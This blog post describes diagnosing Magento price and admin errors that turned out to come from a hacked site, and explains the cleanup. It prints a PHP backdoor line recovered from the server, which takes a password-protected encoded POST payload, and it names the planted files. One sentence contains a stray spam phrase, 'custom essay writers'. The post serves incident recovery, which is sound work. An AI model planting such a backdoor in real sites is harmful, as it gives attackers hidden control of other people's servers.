Enquiry Email Form

Just to clarify, I hate Magento with a passion. I find it cumbersome and unbelievably bloated, and the filing system is a minefield. Not to mention, the community and support is a complete joke. I could go on forever about their shortfalls, but I won’t. Hopefully you get a sense of my despair, though.

Unfortunately, we’ve been working with a client for a few years that has a Magento ecomm website (our first and last Magento client, that’s for sure). We genuinely dread whenever he wants any updates.

I don’t usually provide Magento support or bug fixes, but my conscience won’t allow me to carry on with life without guilt unless I document this fix, because I tried Googling for an answer and looking to the community for help, but I got nowhere!! I wouldn’t wish my last 16 hours (yes, that’s how long I’ve been working on a solution) on my worst enemy.

Anyways, this morning we were notified of a rather alarming error, which looked like this:

magento-error

That error had replaced what would normally be the “price” of a product.

We had no idea why it was occurring. But it was obviously serious custom essay writers. So serious that the website was unusable, and we couldn’t even log into the admin control panel, because it was also riddled with related errors:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<strong>Unknown number format type 'boolean'. Format '' must be a valid number format string.</strong>
#0 /var/www/vhosts//httpdocs/lib/Zend/Locale/Format.php(305): Zend_Locale_Format::_checkOptions(Array)
#1 /var/www/vhosts//httpdocs/lib/Zend/Currency.php(186): Zend_Locale_Format::toNumber('0.000000', Array)
#2 /var/www/vhosts//httpdocs/app/code/core/Mage/Directory/Model/Currency.php(233): Zend_Currency->toCurrency('0.000000', Array)
#3 /var/www/vhosts//httpdocs/app/code/core/Mage/Directory/Model/Currency.php(216): Mage_Directory_Model_Currency->formatTxt(NULL, Array)
#4 /var/www/vhosts//httpdocs/app/code/core/Mage/Directory/Model/Currency.php(197): Mage_Directory_Model_Currency->formatPrecision(NULL, 2, Array, true, false)
#5 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard/Bar.php(82): Mage_Directory_Model_Currency->format(NULL)
#6 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard/Bar.php(62): Mage_Adminhtml_Block_Dashboard_Bar->format(NULL)
#7 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard/Totals.php(74): Mage_Adminhtml_Block_Dashboard_Bar->addTotal('Revenue', NULL)
#8 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Block/Abstract.php(238): Mage_Adminhtml_Block_Dashboard_Totals->_prepareLayout()
#9 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(456): Mage_Core_Block_Abstract->setLayout(Object(Mage_Core_Model_Layout))
#10 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Block/Dashboard.php(50): Mage_Core_Model_Layout->createBlock('adminhtml/dashb...')
#11 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Block/Abstract.php(238): Mage_Adminhtml_Block_Dashboard->_prepareLayout()
#12 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(456): Mage_Core_Block_Abstract->setLayout(Object(Mage_Core_Model_Layout))
#13 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(472): Mage_Core_Model_Layout->createBlock('adminhtml/dashb...', 'dashboard')
#14 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(239): Mage_Core_Model_Layout->addBlock('adminhtml/dashb...', 'dashboard')
#15 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(205): Mage_Core_Model_Layout->_generateBlock(Object(Mage_Core_Model_Layout_Element), Object(Mage_Core_Model_Layout_Element))
#16 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/Layout.php(210): Mage_Core_Model_Layout->generateBlocks(Object(Mage_Core_Model_Layout_Element))
#17 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Action.php(344): Mage_Core_Model_Layout->generateBlocks()
#18 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Action.php(269): Mage_Core_Controller_Varien_Action->generateLayoutBlocks()
#19 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/Controller/Action.php(275): Mage_Core_Controller_Varien_Action->loadLayout(NULL, true, true)
#20 /var/www/vhosts//httpdocs/app/code/core/Mage/Adminhtml/controllers/DashboardController.php(40): Mage_Adminhtml_Controller_Action->loadLayout()
#21 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Action.php(419): Mage_Adminhtml_DashboardController->indexAction()
#22 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Router/Standard.php(250): Mage_Core_Controller_Varien_Action->dispatch('index')
#23 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Controller/Varien/Front.php(176): Mage_Core_Controller_Varien_Router_Standard->match(Object(Mage_Core_Controller_Request_Http))
#24 /var/www/vhosts//httpdocs/app/code/core/Mage/Core/Model/App.php(354): Mage_Core_Controller_Varien_Front->dispatch()
#25 /var/www/vhosts//httpdocs/app/Mage.php(683): Mage_Core_Model_App->run(Array)
#26 /var/www/vhosts//httpdocs/index.php(87): Mage::run('', 'store')

I tried Googling endlessly for results (even went as far back as page 10 in the SERPS), even reduced myself to using Bing and Yahoo for solutions! I had no luck at all. All I found was a few solutions which involved memcache, but that wasn’t our problem, because the website doesn’t even have memcache enabled. If you’re experiencing this problem or something similar after installing memcache, this thread on Stackoverflow might be helpful.

Interestingly though, I found a bunch of other Magento websites (clearly abandoned websites) that were showing the same errors, like this website for example. Looks like the owner gave up (don’t blame him/her)!

Solution

If enabling a caching system didn’t cause the problem, then I’m afraid it’s quite possible that your website’s security has been compromised. That was our problem.

After spending 10 hours trying to diagnose the problem, I noticed some odd files lurking around, and that’s when it struck me, the website had been hacked.

Step 1: delete malicious files
I found and deleted the following files, which were clearly malicious:

ml.php
unzip.php
testosteron.php
mainconfig.php

This is an example of what some of files contains:

1
<?php  if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1"){echo "200"; exit;} if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="[email protected]%WsJaz7EKX1DhMr&")sprintf(gzuncompress(base64_decode($_POST["chk"]))); ?>

A few of the other files contained “file uploading” forms/code, which was clearly suspicious/dangerous.

Nasty stuff.

I basically went through every folder (yes, it’s very time-consuming) and looked for any recently modified files and then checked the contents. But also, you can often spot a suspicious file by how it’s named (e.g. testosteron.php), so I was also on the look out for those.

Step 2: Zend framework
I *think* the Zend framework files were heavily infected… or at least, something was messing up in there (based on the admin errors).

So I deleted the contents of the /tmp folder, which was full of zend_cache files and uploaded versions from a previous backup.

I also did the same with /app/core/Zend and /lib/Zend (this folder is quite big!) – deleted them both and uploaded versions from a clean backup.

Step 3: Empty Cache
I deleted the cache folder, /var/cache and all the sessions, /var/session (probably not essential, but I did it anyways).

Thankfully that resolved my problem and the website was up and running once again! I pray to God no one else has to suffer like I did over this issue.

Please let me know if this helps you out!

Learning & sharing

This is where we store some of our Web Development thoughts, tips and tricks for both our own uses and for others to learn from. Sharing is caring.

Please feel free to contribute to our blog posts; perhaps even teach us a few tricks of your own. We'd love to hear your thoughts.



X